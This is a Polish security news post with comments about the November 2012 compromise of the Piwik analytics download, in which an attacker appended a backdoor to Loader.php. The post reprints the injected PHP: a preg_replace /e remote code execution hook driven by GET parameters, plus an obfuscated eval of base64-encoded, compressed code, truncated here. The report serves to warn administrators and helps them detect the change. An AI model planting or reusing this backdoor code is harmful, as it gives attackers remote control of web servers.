27.11.2012 | 19:25

Adam Haertle

Backdoor w Piwiku

Piwik, darmowe oprogramowanie do analizy ruchu www, zostało wczoraj na kilka godzin wzbogacone o dodatkowy, nieautoryzowany fragment kodu. Co  ciekawe, do włamania doszło poprzez niesprecyzowaną wtyczkę WordPressa, używanego na serwerze Piwika. Włamywacz zmodyfikował plik ZIP wersji 1.9.2. Jeśli wczoraj po południu lub w nocy instalowaliście lub aktualizowaliście Piwika, lepiej sprawdźcie, czy nie dostaliście 'bonusu”. Na końcu pliku piwik/core/Loader.php włamywacz dodał kod

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

Backdoor dodany przez włamywacza przesyła na wskazany adres link do serwera, na którym zainstalowano zainfekowaną wersję oraz umozliwia zdalne wykonanie kodu na tym serwerze. Jeśli znajdziecie taki fragment, najlepiej zrobić backup konfiguracji i usunąć cały folder Piwika i wgrać nową, świeżą kopię, a następnie przejrzeć logi httpd pod kątem podejrzanych wpisów.

Co ciekawe, incydent pokazuje, jak czujni są użytkownicy – administratorzy Piwika otrzymali 5 raportów o wykrytym zagrożeniu w ciągu 2 godzin. To budujące, że tylu użytkowników czyta kod instalowanych aplikacji.

Powrót

Komentarze

  • 2012.11.27 22:33 Poncki

    Pragmatyka podpowiada, że to niestety raczej nie czytanie kodu. Albo komuś sypnęło po logach, że nie ma modułu CURLa, albo (lepszy wariant) „firewall zawył” po wykryciu połączenia nawiązywanego przez httpd…

    Odpowiedz
    • 2012.11.27 22:39 Adam

      Chyba obie teorie jednak upadną – okazuje się, że Piwik ma kontrolę integralności (a przynajmniej rozmiaru plików) wbudowaną w instalator. Miała sprawdzać, czy upload plików na serwer się udał, a wykryła coś więcej – tak przynajmniej wynika z wpisów na forum.

      Odpowiedz

Zostaw odpowiedź

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Backdoor w Piwiku

Komentarze